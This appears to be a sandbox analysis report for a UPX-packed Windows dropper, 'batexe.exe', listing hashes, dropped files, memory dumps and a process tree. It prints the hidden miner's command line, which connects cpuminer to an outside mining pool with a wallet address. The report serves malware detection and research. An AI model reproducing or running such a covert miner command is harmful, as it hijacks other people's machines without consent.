73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
19/02/2024, 15:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3780	b2e.exe
5080	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5080	cpuminer-sse2.exe
5080	cpuminer-sse2.exe
5080	cpuminer-sse2.exe
5080	cpuminer-sse2.exe
5080	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3648-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3648 wrote to memory of 3780	3648	batexe.exe	73
PID 3648 wrote to memory of 3780	3648	batexe.exe	73
PID 3648 wrote to memory of 3780	3648	batexe.exe	73
PID 3780 wrote to memory of 2396	3780	b2e.exe	74
PID 3780 wrote to memory of 2396	3780	b2e.exe	74
PID 3780 wrote to memory of 2396	3780	b2e.exe	74
PID 2396 wrote to memory of 5080	2396	cmd.exe	77
PID 2396 wrote to memory of 5080	2396	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3648
- C:\Users\Admin\AppData\Local\Temp\C5FF.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\C5FF.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\C5FF.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CA55.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C5FF.tmp\b2e.exe

Filesize
3.3MB

MD5
79180b4455d18fe4e49701d20177ae43

SHA1
d6ece12e9ea2c67258ced80642ed0c4dd811c999

SHA256
aea4e0503d5d20b5f18b2acc64bb0c515319a2ecc250031fd1d0b7dbd4cbd987

SHA512
3e2257457eba23d98c38020f58eff95e89bc346fa850288f7d5f27c5bf7a5cbf4465b66caa2b1b8b64578d6f6221907da3786eb8b85bb288fbb5608e9fbb872f

Download Submit
C:\Users\Admin\AppData\Local\Temp\C5FF.tmp\b2e.exe

Filesize
3.0MB

MD5
60ffe2071443245a5ecd44dc6f1dbd1a

SHA1
754dce3b26f0aefe106acc30736cd50de1d8f7ba

SHA256
004dd68240ec97d4b3e459907703b7d66326b4378bfc2dd27738318dc9474916

SHA512
6cafdb746d5be3dff710d8412fb8b7a125c2682f803270fca4076c1d0c53726bcc7c69b23161faa37b87111aa62c49432a521d7c9a7e5bba7d40fb4e271ec69d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CA55.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
286KB

MD5
e440e770f2485b50b863c8648df2add8

SHA1
99e7211bc26d5d10ff9753b5a425630870cf59f6

SHA256
306df0fa2bbe3ddde32e4f18a46e405bcd422cb290b2168005ce88733185d83d

SHA512
9d5a119efc74c1565627d8cde8313e54664817240a65facf810e14eaa014c7a290f47eda41942dd5479e74e83560d9efea4c40e70795b4e19d703e2c9a89d944

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
98KB

MD5
eb6673a594eb1bcf9eabfbc7911aa34d

SHA1
c66979f99eb62150cda0068714c6802bd0633783

SHA256
565b01644477a6a64affdf0a7a0d4fcae411a390dcad32471937879650a85666

SHA512
27173852e775a8ea56e43112830c7d4af254b68030380606e17ea0d0dfc3298c9d73ac23b2de602f60c46159dc743b037aa0902d08058dff40bc6150eb958e31

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
105KB

MD5
0ff1360a50f31903abd1e77f009f34d9

SHA1
7c63e5a145a1e77324dfa5c54152a51d0e5b76b2

SHA256
b55a5faaa225949be5768bb8c859c68aade1953f0f9df23c3835ad563c050983

SHA512
5e12fd46b82cb66a20aa801157915b1500177dc24630807bfdf6abf71ca7b9e0cd3bba047fcfb98537ef5d2927010b1fda26a17174fceaf989171d7ac44772de

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
234KB

MD5
44c5dba7ba58589cf182d142e622ab44

SHA1
dc5746b84e7f62e5a6e7a6992b0f7433241898d8

SHA256
fcea4f2a86c1ef0c950f15c2640a607b88d1b352a1eb88433594a77696417ae5

SHA512
9f5b94177a5ab5d2306557f20e8672b863998d5c48c5ba78282ebd73dba5cefb4b71e617575f655fe1cac842737ecade1f64d88b544361bf17acca3595701d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
147KB

MD5
7ad14fdcdefea2ac3a34e2fdbb9b5dd4

SHA1
ed3cec277052a29d754f98062f39932ccd43a3be

SHA256
16c7f849de1b44247d68126f5e843bf2989c6b11e145113aa4d15cd7e65602e3

SHA512
528ee7f632e8c78c92e83a10cdf1e8ab215ae05f0c434674ebe56ec190ae79bafab25dd095a38895745038e1deabae56096f7585145f567149823aebbf77b2f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
31KB

MD5
eca78ff0d8219eea27b94e9c389c76df

SHA1
9fc601e62a721c3369ec3fc64e2286a8e5662602

SHA256
15e557fb956080f917caa114490eeaddffdbc3ebf01bb760ca1aa33442f2a7d4

SHA512
3d6c5054aef8b0e223fc7690e2a3db53a81c66171a04c353e8733bdc2e059f3b747863f9a3bd118431bc3e1c964b604bfed5f3ce4bc0d1ea1290a072515e0373

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
43KB

MD5
54e5c92f023ce33e94d58de1864365ba

SHA1
d8890a7e119fe110960268fdd387f7dbc6e57e22

SHA256
192e401cf04741d86775733063348390806dea5da12ce56494ae3e8b7ac262aa

SHA512
3f854d88dc245a9cc6a5be98de5d2105c11f03db5711dc60b42a56d3286c3428f8428556d2b14318d52d7508ddf60913d94ac4a0f38b422462ca51ceda73a6e9

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
108KB

MD5
e9ecf36139726aaf1ae4f01b731a0e73

SHA1
e66d8f49ddd1e126177e283c6dbc6ab1c72ce01d

SHA256
aaf529167ca49d85fc475d374f9bafa98cb0a512faf8294ee2cc24771518fda0

SHA512
20f346e64268cc81bc5473cdd38a6bf3688b351bb20d74b3be15ef97fef1dc9d66dccd24a59779487bdc9ce6b37e06d62ae3f2a85e8eb5553dddb968ddc065a5

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
116KB

MD5
db9f8201b09978cdd502a38117e57edd

SHA1
509b79675178d3ff7e049a9868354621af0d420b

SHA256
317551401ccb0a1b2c8652778558a93d63910029c0ed2f8dd1cee4ded6598794

SHA512
84e9ea836c3517c8fb25e113cfe9ceecb96e639285cfeee80b3040684587943d6dd24f7795c3e863efff99428640c359891a66701ee6955ec010d74286081800

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
216KB

MD5
36e2811c1cf22ee1fe1b09b2760fad3f

SHA1
b2de8a6825987bf0f1629b0f66abf36bf52c4116

SHA256
9dd87fed23c5d1bedebfcb202f35a221b354e8e3836192c44783494a6aedd389

SHA512
ea66bf3f81e51ce3b9fbaa5fba61111d8a75073b06d67f1f2bd385bead2edc708fb7fe6d1d2d87ec465926dac3e4a9c0dfe292a38e0f71dfc6ede07f0a8e119f

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
42KB

MD5
61da3dda4e5628888964b1af36f949ff

SHA1
ccab8f373c0a095beb3b59ffa677bac8946a5294

SHA256
9f815d0e501ab587cc87083f0cd6ce3f272b4181ef110f8f4bcc52162df64f7f

SHA512
9ad983ae20984ee6b46690573fbeda54071dac7ef71e01a016c4dcff68530ba21b3d7307fcd9a7ba7a53d283fa334d16647fbd5e5c3879d7540513648bfd5658

Download Submit
memory/3648-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3780-51-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3780-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5080-43-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/5080-57-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-41-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-45-0x00000000519F0000-0x0000000051A88000-memory.dmp

Filesize
608KB

Download
memory/5080-44-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/5080-46-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-38-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/5080-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5080-62-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-67-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-87-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5080-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download